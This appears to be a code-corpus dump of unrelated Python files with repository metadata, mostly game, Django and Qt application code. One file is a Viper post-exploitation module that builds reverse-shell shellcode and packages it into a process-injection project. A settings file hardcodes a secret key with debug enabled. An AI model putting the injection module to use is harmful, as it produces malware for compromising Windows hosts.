self.closeCurrentDialog = None
if self.gameFSM:
self.gameFSM.request('StartGame', recipe)
def testRecipe(self):
for column in self.gameBoard.boardPieces:
for piece in column:
if piece is not None:
for ingredient in self.currentRecipe.ingredients:
if ingredient.completed == False and piece.colorIndex == ingredient.colorIndex and piece.level == ingredient.level:
return True
continue
return False
def showIngredientXP(self, ingredient):
if not self.currentRecipe.complete:
xpAmt = PotionGlobals.getPotionBuffXP(self.currentRecipe.potionID)
if len(self.currentRecipe.ingredients) > 1:
xpAmt = int(math.ceil(float(xpAmt) / 2.0 * float(len(self.currentRecipe.ingredients) - 1)))
xpLabel = DirectLabel(parent = aspect2d, relief = None, text = '+ ' + str(xpAmt) + ' ' + PLocalizer.PotionGui['XPLabel'], text_scale = PiratesGuiGlobals.TextScaleTitleMed, text_font = PiratesGlobals.getPirateOutlineFont(), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_wordwrap = 37, pos = (ingredient.getX(aspect2d) + 0.1, 0, ingredient.getZ(aspect2d) - 0.05), textMayChange = 0)
xpLabel.setTransparency(True)
xpLabel.stash()
return Sequence(Func(xpLabel.unstash), Parallel(LerpPosInterval(xpLabel, duration = 1.5, pos = (ingredient.getX(aspect2d) + 0.1, 0.0, ingredient.getZ(aspect2d) + 0.1), blendType = 'easeOut'), LerpColorScaleInterval(xpLabel, duration = 1.5, colorScale = (1, 1, 1, 0), blendType = 'easeIn')), Func(xpLabel.remove_node))
else:
return Wait(0.1)
def checkRecipe(self):
self.ingredientsCompleted = 0
if len(self.currentRecipe.ingredients) != 0:
for column in self.gameBoard.boardPieces:
for piece in column:
if piece is not None:
pieceUsed = False
for ingredient in self.currentRecipe.ingredients:
if ingredient.completed == False and piece.colorIndex == ingredient.colorIndex and piece.level == ingredient.level and not pieceUsed:
ingredient.completed = True
self.ingredientsCompleted += 1
self.gameBoard.boardPieces[int(piece.column)][int(piece.row)] = None
pieceUsed = True
self.currentRecipe.complete = True
for testingredient in self.currentRecipe.ingredients:
if testingredient.completed == False:
self.currentRecipe.complete = False
continue
piece.wrtReparentTo(self.currentRecipe)
piece.setY(-5)
print 'adding animation for completed ingredient'
self.animationList.append(Sequence(piece.moveToBoardVerySlow(ingredient.column, ingredient.row), Func(ingredient.updateDisplay), Func(piece.remove_node), Func(self.gameBoard.kill, piece)))
self.postAnimationList.append(self.showIngredientXP(ingredient))
continue
def destroy(self):
self.ignoreAll()
self.gameFSM.ignoreAll()
self.ignore('seachestOpened')
self.ignore('seachestClosed')
if self.introSequence:
self.introSequence.pause()
self.introSequence = None
if self.outroSequence:
self.outroSequence.pause()
self.outroSequence = None
if self.completeSequence:
self.completeSequence.pause()
self.completeSequence = None
if self.restartSequence:
self.restartSequence.pause()
self.restartSequence = None
self.cleanUpConfirm()
self.closeButton.destroy()
del self.closeButton
self.returnButton.destroy()
del self.returnButton
self.background.remove_node()
del self.background
self.buttonsBackground.remove_node()
del self.buttonsBackground
self.fadeIn.remove_node()
del self.fadeIn
self.xpBackground.remove_node()
del self.xpBackground
self.foregroundLayer.remove_node()
del self.foregroundLayer
self.foregroundTextureCard.remove_node()
del self.foregroundTextureCard
self.recipePicker.destroy()
del self.recipePicker
self.resultsScreen.destroy()
self.resultsScreen = None
self.failScreen.destroy()
del self.failScreen
self.infoScreen.destroy()
del self.infoScreen
self.hintScreen.destroy()
del self.hintScreen
self.gameBoard.destroy()
del self.gameBoard
base.musicMgr.stop(SoundGlobals.MUSIC_MINIGAME_POTION)
self.dist.done()
self.gameFSM.destroy()
del self.gameFSM
self.gameFSM = None
for recipe in self.recipes:
recipe.reset()
recipe.destroy()
del self.recipes
def updateResultsScreen(self):
if self.resultsScreen:
self.resultsScreen.show()
| [
"[email protected]"
] | |
a39ac72e3dd8293bb7c5a117983a0650437216be | 8e52e07428cb9ded3e96db45e9d9e4444ba80224 | /vegetableOrder/migrations/0007_auto_20170422_1146.py | dff84affaada50f0eb21a18d502b84f3ebcf05f5 | [] | no_license | prashantspandey/mohanamandi | c2f8a1763813f7df21db7579bcb44b9f390d870f | 99231feaa9eb442d20a65a6754ec5b1df4e5208c | refs/heads/master | 2021-01-20T05:15:31.741033 | 2017-04-29T05:44:32 | 2017-04-29T05:44:32 | 89,766,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 747 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-04-22 06:16
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('vegetables', '0005_vegetable_subpricekg'),
('vegetableOrder', '0006_auto_20170422_1142'),
]
operations = [
migrations.RemoveField(
model_name='vegetable_order',
name='ordercart',
),
migrations.AddField(
model_name='vegetable_order',
name='orderveg',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='vegetables.Vegetable'),
),
]
| [
"[email protected]"
] | |
b996c977517f5ce622b698b1872d39647e064362 | 06a863150a7a3a7bfc0c341b9c3f267727606464 | /lib/gii/qt/controls/Settings.py | 417bb2b0cbf6570f8ede7d3aaa6f6f5318978c4f | [
"MIT"
] | permissive | brucelevis/gii | c843dc738a958b4a2ffe42178cff0dd04da44071 | 03624a57cf74a07e38bfdc7f53c50bd926b7b5a7 | refs/heads/master | 2020-10-02T00:41:02.723597 | 2016-04-08T07:44:45 | 2016-04-08T07:44:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | from PyQt4 import QtCore
globalSettings=QtCore.QSettings('Hatrix','GII')
def setGlobalSettingFile(filepath):
global globalSettings
globalSettings=QtCore.QSettings(filepath, QtCore.QSettings.IniFormat)
def getGlobalSettings():
return globalSettings
def setSettingValue(name, value):
globalSettings.setValue(name, value)
def getSettingValue(name):
return globalSettings.getValue(name)
setGlobalSettingFile('gii.ini') | [
"[email protected]"
] | |
ddcb78be7a534d96575e83381e99bcf1d76d713c | a2706c66c4f2769c00fc5f67e1a85742cfa7e17c | /MODULES/Execution_UserExecution_NtCreateSection.py | f244911cfec971ee6844a6865d5e9bd77056d65a | [
"BSD-3-Clause"
] | permissive | Jeromeyoung/viperpython | 48800312dcbdde17462d28d45865fbe71febfb11 | ba794ee74079285be32191e898daa3e56305c8be | refs/heads/main | 2023-09-01T18:59:23.464817 | 2021-09-26T04:05:36 | 2021-09-26T04:05:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,122 | py | # -*- coding: utf-8 -*-
# @File : SimpleRewMsfModule.py
# @Date : 2019/1/11
# @Desc :
import time
from Lib.ModuleAPI import *
class PostModule(PostPythonModule):
NAME_ZH = "NtCreateSection进程注入"
DESC_ZH = "使用NtCreateSection及NtMapViewOfSection远程线程注入技术打开共享内存,将shellcode注入到其他进程中"
NAME_EN = "NtCreateSection process injection"
DESC_EN = "Use NtCreateSection and NtMapViewOfSection remote thread injection technology to open shared memory and inject shellcode into other processes"
MODULETYPE = TAG2TYPE.Execution
PLATFORM = ["Windows"] # 平台
PERMISSIONS = ["User", "Administrator", "SYSTEM"] # 所需权限
ATTCK = [] # ATTCK向量
README = ["https://www.yuque.com/vipersec/module/hncv58"]
REFERENCES = ["https://idiotc4t.com/code-and-dll-process-injection/untitled"]
AUTHOR = "Viper"
OPTIONS = register_options([
OptionHander(),
])
def __init__(self, sessionid, ipaddress, custom_param):
super().__init__(sessionid, ipaddress, custom_param)
def check(self):
"""执行前的检查函数"""
payload = self.get_handler_payload()
if "windows" not in payload:
return False, "选择handler错误,请选择windows平台的监听", "Select the handler error, please select the handler of the windows platform"
return True, None
def run(self):
shellcode = self.generate_hex_reverse_shellcode_by_handler()
FUNCTION = self.random_str(8)
FUNCTION1 = self.random_str(9)
source_code = self.generate_context_by_template(filename="main.cpp", SHELLCODE_STR=shellcode, FUNCTION=FUNCTION,
FUNCTION1=FUNCTION1)
filename = f"NtCreateSection_{int(time.time())}.zip"
self.write_zip_vs_project(filename, source_code, )
self.log_info("模块执行完成", "Module operation completed")
self.log_good(f"请在<文件列表>中查看生成的源码: {filename}", f"Please check the generated source code in <Files>: {filename}")
| [
"[email protected]"
] | |
22ff3c8ec043a748f85e7e330611f00ac0949c95 | e86d020f8ade86b86df6ad8590b4458a9d415491 | /projects/test-crrr/base_mission/utils/check_logger.py | c944ef41446f4be841f1c6a115e7d739a4cbadc0 | [] | no_license | g842995907/guops-know | e4c3b2d47e345db80c27d3ba821a13e6bf7191c3 | 0df4609f3986c8c9ec68188d6304d033e24b24c2 | refs/heads/master | 2022-12-05T11:39:48.172661 | 2019-09-05T12:35:32 | 2019-09-05T12:35:32 | 202,976,887 | 1 | 4 | null | 2022-11-22T02:57:53 | 2019-08-18T08:10:05 | JavaScript | UTF-8 | Python | false | false | 1,610 | py | # -*- coding: utf-8 -*-
import hashlib
import logging
import os
import sys
from cr_scene.utils.uitls import get_cr_scene_name
from cr import settings
def scene_log_key(scene_name, name):
_key = hashlib.md5('{}-scene'.format(scene_name)).hexdigest()
return _key
class SceneLogFactory(object):
logger_pool = {}
def __new__(cls, scene_id, name):
scene_name = get_cr_scene_name(scene_id)
_key = scene_log_key(scene_name, name)
if _key in cls.logger_pool:
_logger = cls.logger_pool[_key]
else:
_logger = cls._generate(_key, scene_name)
cls.logger_pool[_key] = _logger
return _logger
@classmethod
def _generate(cls, key, scene_name):
logger = logging.getLogger(key)
# 指定logger输出格式
# formatter = logging.Formatter('%(levelname)s %(asctime)s %(module)s - %(message)s')
formatter = logging.Formatter('%(levelname)s %(asctime)s - %(message)s')
# 文件日志
file_handler = logging.FileHandler(os.path.join(settings.BASE_DIR, 'log/scene-{}.log'.format(scene_name)))
file_handler.setFormatter(formatter) # 可以通过setFormatter指定输出格式
# 控制台日志
console_handler = logging.StreamHandler(sys.stdout)
console_handler.formatter = formatter # 也可以直接给formatter赋值
# 为logger添加的日志处理器
logger.addHandler(file_handler)
logger.addHandler(console_handler)
logger.setLevel(logging.INFO)
logger.propagate = 0
return logger
| [
"[email protected]"
] | |
de84dd671bfd25d67ce441fe83f372dad36cf79d | d62863d049c0206bfa744ca4c9e886030bfce1ab | /apps/sw_shop/sw_order/admin.py | 8f33c1274fda9fbe76529288d4886588f0b35c83 | [] | no_license | jurgeon018/box | 51738b99e640202936ed72357d3c67d2517e589b | 50b84a0afa73fab85a00eef54194f3c126d15397 | refs/heads/master | 2021-07-17T13:37:08.665292 | 2020-10-15T09:50:33 | 2020-10-15T09:50:33 | 232,013,297 | 0 | 1 | null | 2020-03-27T02:16:44 | 2020-01-06T03:01:34 | Python | UTF-8 | Python | false | false | 9,541 | py | from django.utils.translation import gettext_lazy as _
from django.contrib import admin
from django.shortcuts import reverse, render, redirect
from django.utils.html import mark_safe
from django.conf import settings
from box.apps.sw_shop.sw_order.models import Order, OrderStatus, Payment
# from box.apps.sw_payment.liqpay.admin import PaymentInline
from box.apps.sw_shop.sw_cart.admin import CartItemInline
from box.core.utils import show_admin_link
from box.core.sw_solo.admin import SingletonModelAdmin
from .models import *
from .filters import *
from .forms import *
from modeltranslation.admin import TabbedTranslationAdmin, TranslationStackedInline, TranslationTabularInline
if 'jet' in settings.INSTALLED_APPS:
from jet.filters import DateRangeFilter, DateTimeRangeFilter
else:
from rangefilter.filter import DateRangeFilter, DateTimeRangeFilter
import nested_admin
from import_export.admin import ImportExportModelAdmin
from .resources import *
class OrderInline(admin.TabularInline):
def show_link(self, obj):
return mark_safe(f'<a href="/admin/sw_order/order/{obj.id}/change">Замовлення № {obj.id}</a>')
show_link.short_description = _("Ссилка")
model = Order
extra = 0
fields = [
'show_link',
'name',
'email',
'phone',
'address',
'total_price',
'paid',
'ordered',
'created',
]
readonly_fields = [
'show_link'
]
def has_change_permission(self, request, obj):
return False
def has_delete_permission(self, request, obj):
return False
def has_add_permission(self, request, obj):
return False
@admin.register(OrderStatus)
class OrderStatusAdmin(
TabbedTranslationAdmin,
ImportExportModelAdmin,
):
def get_model_perms(self, request):
return {}
resource_class = OrderStatusResource
search_fields = [
'name'
]
@admin.register(Payment)
class PaymentAdmin(admin.ModelAdmin):
pass
class PaymentInline(nested_admin.NestedTabularInline):
def has_add_permission(self, request, obj=None):
return False
def has_change_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return False
model = Payment
extra = 0
exclude = []
@admin.register(Order)
class OrderAdmin(nested_admin.NestedModelAdmin):
def total_with_coupon(self, obj=None):
return f'{obj.total_price_with_coupon} {obj.currency}'
def total_without_coupon(self, obj=None):
return f'{obj.total_price} {obj.currency}'
# return f'{obj.total_price_with_coupon} {obj.currency}'
def show_user(self, obj):
link = show_admin_link(obj, obj_attr='user', obj_name='username', option='change')
return link
def show_id(self, obj):
return mark_safe(f'<a href="/admin/sw_order/order/{obj.id}/change" >Замовлення № {obj.id}</a>')
def items_count(self, obj):
return obj.cart_items.all().count()
def delete(self, obj):
return mark_safe(f'<a href="/admin/sw_order/order/{obj.id}/delete" style="color:red" >x</a>')
# TODO: проміжні дії переробити на фукнцію
def change_status(self, request, queryset):
form = None
if 'apply' in request.POST:
form = ChangeStatusForm(request.POST)
if form.is_valid():
status = form.cleaned_data['status']
count = 0
for item in queryset:
item.status = status
item.save()
count += 1
self.message_user(request, f'Статус {status} був застосований для {count} товарів')
return redirect(request.get_full_path())
if not form:
form = ChangeStatusForm(initial={"_selected_action":request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'order/admin/change_status.html', {'items':queryset, 'form':form, 'title':'Зміна статусу'})
def put_tags_on(self, request, queryset):
form = None
print(request.POST)
if 'apply' in request.POST:
form = ChangeTagsForm(request.POST)
if form.is_valid():
tags = form.cleaned_data['tags']
count = 0
for item in queryset:
for tag in tags:
item.tags.add(tag)
item.save()
count+=1
self.message_user(request, f'Теги {tags} були додані до {count} товарів')
return redirect(request.get_full_path())
if not form:
form = ChangeTagsForm(initial={'_selected_action':request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'order/admin/change_tags.html', {
'items':queryset, 'form':form, 'title':'Зміна тегів',
'value':'put_tags_on',
'text':'Новый тег будет назначен для следующих позиций'
})
def put_tags_off(self, request, queryset):
form = None
print(request.POST)
if 'apply' in request.POST:
form = ChangeTagsForm(request.POST)
if form.is_valid():
tags = form.cleaned_data['tags']
count = 0
for item in queryset:
for tag in tags:
item.tags.remove(tag)
item.save()
count+=1
self.message_user(request, f'Теги {tags} були забрані з {count} товарів')
return redirect(request.get_full_path())
if not form:
form = ChangeTagsForm(initial={'_selected_action':request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'order/admin/change_tags.html', {
'items':queryset, 'form':form, 'title':'Зміна тегів',
'value':'put_tags_off',
'text':'Теги будуть забрані з наступних позицій'
})
def show_tags(self, obj):
result = ''
for tag in obj.tags.all():
result += (f'<span style="background-color:{tag.color}">{tag.name}</span><br>')
if not result:
return '---'
return mark_safe(result)
show_tags.short_description = ("Теги")
actions = [
change_status,
put_tags_on,
put_tags_off,
]
date_hierarchy = 'created'
show_user.short_description = _('Користувач')
show_id.short_description = _('ID замовлення')
items_count.short_description = _('Товари')
total_with_coupon.short_description = _('Сумма замовлення без скидки')
total_without_coupon.short_description = _('Сумма замовлення зі скидкою')
inlines = [
CartItemInline,
PaymentInline,
]
list_display = [
'show_id',
'name',
'status',
'show_tags',
'items_count',
'total_price',
'created',
'delete',
]
list_display_links = [
'show_id',
'name',
'items_count',
'total_price',
'created',
]
list_editable = [
'status'
]
search_fields = [
'user__username',
'name',
'email',
'phone',
'address',
'note',
]
list_filter = [
'status',
'tags',
# ('created', DateTimeRangeFilter),
('created', DateRangeFilter),
# ('updated', DateTimeRangeFilter),
('updated', DateRangeFilter),
]
fields = [
# 'user',
'show_user',
'status',
'tags',
'name',
'email',
'phone',
'address',
'comments',
'coupon',
'payment_opt',
'delivery_opt',
'ordered',
'paid',
"total_with_coupon",
"total_without_coupon",
'note',
]
if 'jet' not in settings.INSTALLED_APPS:
autocomplete_fields = [
'status',
'tags',
'coupon',
]
readonly_fields = [
'show_user',
'total_with_coupon',
'total_without_coupon',
]
list_per_page = 100
@admin.register(ItemRequest)
class ItemRequestAdmin(admin.ModelAdmin):
def show_item(self, obj=None):
from django.shortcuts import reverse
from django.utils.html import mark_safe
option = "change" # "delete | history | change"
massiv = []
obj = obj.item
app = obj._meta.app_label
model = obj._meta.model_name
url = f'admin:{app}_{model}_{option}'
href = reverse(url, args=(obj.pk,))
name = f'{obj.title}'
link = mark_safe(f"<a href={href}>{name}</a>")
return link
show_item.short_description = _('Товар')
readonly_fields = [
'show_item',
'name',
'email',
'phone',
'message',
]
fields = [
'show_item',
'name',
'email',
'phone',
'message',
]
class OrderStatusInline(TranslationTabularInline):
extra = 0
model = OrderStatus
class OrderRecipientEmailInline(admin.TabularInline):
model = OrderRecipientEmail
exclude = []
extra = 0
class OrderAdditionalPriceInline(admin.TabularInline):
model = OrderAdditionalPrice
exclude = []
extra = 0
@admin.register(OrderConfig)
class OrderConfigAdmin(SingletonModelAdmin):
inlines = [
OrderStatusInline,
OrderRecipientEmailInline,
OrderAdditionalPriceInline,
]
| [
"[email protected]"
] | |
e5766dadf98150deffa339dbefa2d888f7af7282 | 44869749f8af2b548a2fbb23403e1a623e29d691 | /mysite/mysite/settings.py | 208621a7982a95d9f9f745f6e2c27df05323735f | [] | no_license | Ojou/my-first-blog | 4536c4db194d325508fd000ccd5919a722772994 | e29be78c3c87b39c474dabf2a27387797c2d2a41 | refs/heads/master | 2016-08-12T15:27:52.761420 | 2016-03-12T05:06:06 | 2016-03-12T05:06:06 | 53,712,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,164 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ze-3#6+ge)9r78ditv6bquz(&+2wkfs9a8o_zm$$_03r=c+c6m'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
8ea309b27efb5e75178ac071e23b510c86ee4065 | 270611d0cfe130fa3c1aa84665e0748c1ddb6ab8 | /instamojo/__init__.py | 7640c9159f96d87251ad5444549796488e5c03cd | [
"BSD-2-Clause"
] | permissive | iambibhas/instamojo-py | 1096a8b81fb3a6b9839cb10c4dd5dc246f2752c7 | 1e80bde09d63cee56f403e4b635e0a62c014af81 | refs/heads/master | 2021-01-14T12:21:19.714552 | 2014-11-08T17:23:42 | 2014-11-08T17:23:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27 | py | from .api import Instamojo
| [
"[email protected]"
] | |
2d2a84da60052c7bbdf576522c35aae0207f76a4 | 75136cd1865bd72ebad8ba31446d57d9fdedce22 | /pepysdiary/common/templatetags/search_tags.py | b9f9268357944463a88b44a9e284a80ec47c36ea | [] | no_license | hugovk/pepysdiary | ca9a1d39ed62e7299509daa69b5df0d5164aec31 | 1a67c11efb62f5392914732ad15a4db71872ed05 | refs/heads/main | 2021-12-03T01:36:16.626676 | 2021-11-08T17:29:51 | 2021-11-08T17:29:51 | 60,296,270 | 0 | 0 | null | 2016-06-02T20:48:07 | 2016-06-02T20:48:05 | null | UTF-8 | Python | false | false | 1,582 | py | from django import template
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from pepysdiary.common.utilities import hilite_words, trim_hilites
register = template.Library()
@register.simple_tag()
def search_summary(obj, search_string):
"""
Returns the HTML to display search results summary text for an object.
It's a series of bits of the object's text fields that contain the
searched-for string, with the search term highlighted.
obj - One of Annotation, Article, Entry, Letter, Post, Topic
search_string - The string that was searched for.
"""
obj_name = obj.__class__.__name__
contents = []
if obj_name == "Entry":
contents = [obj.text, obj.footnotes]
elif obj_name == "Topic":
contents = [obj.title, obj.summary_html, obj.wheatley_html, obj.wikipedia_html]
elif obj_name == "Annotation":
contents = [obj.comment]
elif obj_name == "Letter":
contents = [obj.title, obj.text, obj.footnotes]
else:
# Article, Post
contents = [obj.title, obj.intro_html, obj.text_html]
content = " ".join(contents)
content = hilite_words(content, search_string)
hilites = trim_hilites(content, allow_empty=False, max_hilites_to_show=10)
if hilites["hilites_shown"] < hilites["total_hilites"]:
difference = hilites["total_hilites"] - hilites["hilites_shown"]
extra = f" <em>and {difference} more.</em>"
else:
extra = ""
return format_html("{}{}", mark_safe(hilites["html"]), mark_safe(extra))
| [
"[email protected]"
] | |
b6a956b9818da0da10270c5fa6aa0eaccf12a1d7 | 743c1aa4ae8336645785a5afd768a3c6c7189439 | /BGWpy/BGW/__init__.py | 460615f95d9f5ce43be3666023199be3687052ec | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause-LBNL"
] | permissive | kcantosh/BGWpy | 566e03e888ab17b7d8ff7a68a6033d121532d905 | fc5eda118ccdd18cdcdb88141df2b673456e8bd2 | refs/heads/master | 2021-06-25T14:21:33.426910 | 2017-08-28T18:43:40 | 2017-08-28T18:43:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | from __future__ import print_function
from . import inputs
# Core
from . import bgwtask
# Public
from .kgrid import *
from .epsilontask import *
from .sigmatask import *
from .kerneltask import *
from .absorptiontask import *
from .inteqptask import *
__all__ = (epsilontask.__all__ + sigmatask.__all__ +
kerneltask.__all__ + absorptiontask.__all__ +
kgrid.__all__ + inteqptask.__all__)
| [
"[email protected]"
] | |
3055b260778cf417707db8721cce2a574e8742a8 | a9e3f3ad54ade49c19973707d2beb49f64490efd | /Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/discussion/rest_api/pagination.py | 244d9b96a12060f9438120bf55da8fccfa069296 | [
"AGPL-3.0-only",
"AGPL-3.0-or-later",
"MIT"
] | permissive | luque/better-ways-of-thinking-about-software | 8c3dda94e119f0f96edbfe5ba60ca6ec3f5f625d | 5809eaca7079a15ee56b0b7fcfea425337046c97 | refs/heads/master | 2021-11-24T15:10:09.785252 | 2021-11-22T12:14:34 | 2021-11-22T12:14:34 | 163,850,454 | 3 | 1 | MIT | 2021-11-22T12:12:31 | 2019-01-02T14:21:30 | JavaScript | UTF-8 | Python | false | false | 2,689 | py | """
Discussion API pagination support
"""
from edx_rest_framework_extensions.paginators import NamespacedPageNumberPagination
from rest_framework.utils.urls import replace_query_param
class _Page:
"""
Implements just enough of the django.core.paginator.Page interface to allow
PaginationSerializer to work.
"""
def __init__(self, page_num, num_pages):
"""
Create a new page containing the given objects, with the given page
number and number of pages
"""
self.page_num = page_num
self.num_pages = num_pages
def has_next(self):
"""Returns True if there is a page after this one, otherwise False"""
return self.page_num < self.num_pages
def has_previous(self):
"""Returns True if there is a page before this one, otherwise False"""
return self.page_num > 1
def next_page_number(self):
"""Returns the number of the next page"""
return self.page_num + 1
def previous_page_number(self):
"""Returns the number of the previous page"""
return self.page_num - 1
class DiscussionAPIPagination(NamespacedPageNumberPagination):
"""
Subclasses NamespacedPageNumberPagination to provide custom implementation of pagination metadata
by overriding it's methods
"""
def __init__(self, request, page_num, num_pages, result_count=0):
"""
Overrides parent constructor to take information from discussion api
essential for the parent method
"""
self.page = _Page(page_num, num_pages)
self.base_url = request.build_absolute_uri()
self.count = result_count
super().__init__()
def get_result_count(self):
"""
Returns total number of results
"""
return self.count
def get_num_pages(self):
"""
Returns total number of pages the response is divided into
"""
return self.page.num_pages
def get_next_link(self):
"""
Returns absolute url of the next page if there's a next page available
otherwise returns None
"""
next_url = None
if self.page.has_next():
next_url = replace_query_param(self.base_url, "page", self.page.next_page_number())
return next_url
def get_previous_link(self):
"""
Returns absolute url of the previous page if there's a previous page available
otherwise returns None
"""
previous_url = None
if self.page.has_previous():
previous_url = replace_query_param(self.base_url, "page", self.page.previous_page_number())
return previous_url
| [
"[email protected]"
] | |
09c13e8d7e182c779642a9945ae1d18db780e082 | dec7cac75fb472ab28b57228496b17fdbcf5df1d | /accounting/views.py | 2b319b1591a9b8b214b969d1b42c9bb045ff0ca9 | [] | no_license | sofide/apicolapp | a21be58982957b1115f73a3cc80bbce58832a739 | 32f9df4109540c6fb0c07dc9de2f557ec583a9d9 | refs/heads/master | 2021-06-22T22:34:53.075938 | 2019-03-28T01:27:13 | 2019-03-28T01:27:13 | 133,557,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,131 | py | from datetime import datetime, timedelta, date
from django.contrib.auth.decorators import login_required
from django.db.models import Q, Sum, Count, Prefetch
from django.db.models.functions import Coalesce
from django.shortcuts import render, get_object_or_404, redirect
from accounting import forms
from accounting.manage_data import purchases_by_categories
from accounting.models import Product, Purchase, Category, Sale
def dates_form_processor(request):
"""
Use this function inside a view to process DateFromToForm data.
Return from_date, to_date and an instance of DateFromToForm.
THIS FUNCTION IS NOT A VIEW
"""
# defaults from_date and to_date params
# default period starts the last August 8 and ends today.
to_date = datetime.now().date()
if to_date.month >= 8:
from_year = to_date.year
else:
from_year = to_date.year - 1
from_date = date(from_year, 8, 1)
if request.GET.get('from_date'):
dates_form = forms.DateFromToForm(request.GET)
if dates_form.is_valid():
to_date = dates_form.cleaned_data['to_date']
from_date = dates_form.cleaned_data['from_date']
else:
dates_form = forms.DateFromToForm()
return from_date, to_date, dates_form
@login_required
def accounting_index(request):
"""
Show user's incomes and investments from last year, or between from_date
and to_date recived in POST params.
"""
from_date, to_date, dates_form = dates_form_processor(request)
# INVESTMENTS
purchases = purchases_by_categories(request.user.pk, from_date, to_date)
invested_money = 0
direct_expenses_data = {}
depreciation_purchases_data = {}
for categ_purchase in purchases.values():
invested_money += categ_purchase['amount']
if categ_purchase['depreciation_period']:
data_dict = depreciation_purchases_data
else:
data_dict = direct_expenses_data
data_dict['invested_money'] = round(data_dict.get('invested_money', 0)
+ categ_purchase['amount'], 2)
data_dict['products_count'] = round(data_dict.get('products_count', 0)
+ categ_purchase['products'])
data_dict['purchases_count'] = round(data_dict.get('purchases_count', 0)
+ categ_purchase['total'])
# INCOMES
sales = Sale.objects.filter(
user=request.user,
date__range=(from_date, to_date)
).aggregate(
total=Coalesce(Count('id'), 0),
total_income=Coalesce(Sum('value'), 0),
total_kg=Coalesce(Sum('amount'), 0)
)
result = round(sales['total_income'] - invested_money, 2)
profit = result > 0
return render(request, 'accounting/accounting_index.html', {
'from_date': from_date,
'to_date': to_date,
'dates_form': dates_form,
'invested_money': invested_money,
'direct_expenses_data': direct_expenses_data,
'depreciation_purchases_data': depreciation_purchases_data,
'sales': sales,
'result': result,
'profit': profit,
'datepicker_fields_ids': ['id_from_date', 'id_to_date'],
})
@login_required
def purchase_list(request):
from_date, to_date, dates_form = dates_form_processor(request)
purchases = purchases_by_categories(request.user.pk, from_date, to_date)
return render(request, 'accounting/purchases_list.html', {
'purchases': purchases,
'from_date': from_date,
'to_date': to_date,
'dates_form': dates_form,
'datepicker_fields_ids': ['id_from_date', 'id_to_date'],
})
def product_index(request):
pass
@login_required
def product_edit(request, product_pk=None):
"""Create or edit a product."""
def _next_page(product_object):
"""Define next page if form is valid."""
next = request.GET.get('next', None)
if next == 'purchase':
return redirect('purchase_detail', product_pk=product_object.pk)
else:
return redirect('product_index')
if product_pk:
product_instance = get_object_or_404(Product, pk=product_pk, user=request.user)
else:
product_instance = None
if request.user.is_authenticated:
if request.method == 'POST':
product_form = forms.ProductForm(request.POST, instance=product_instance)
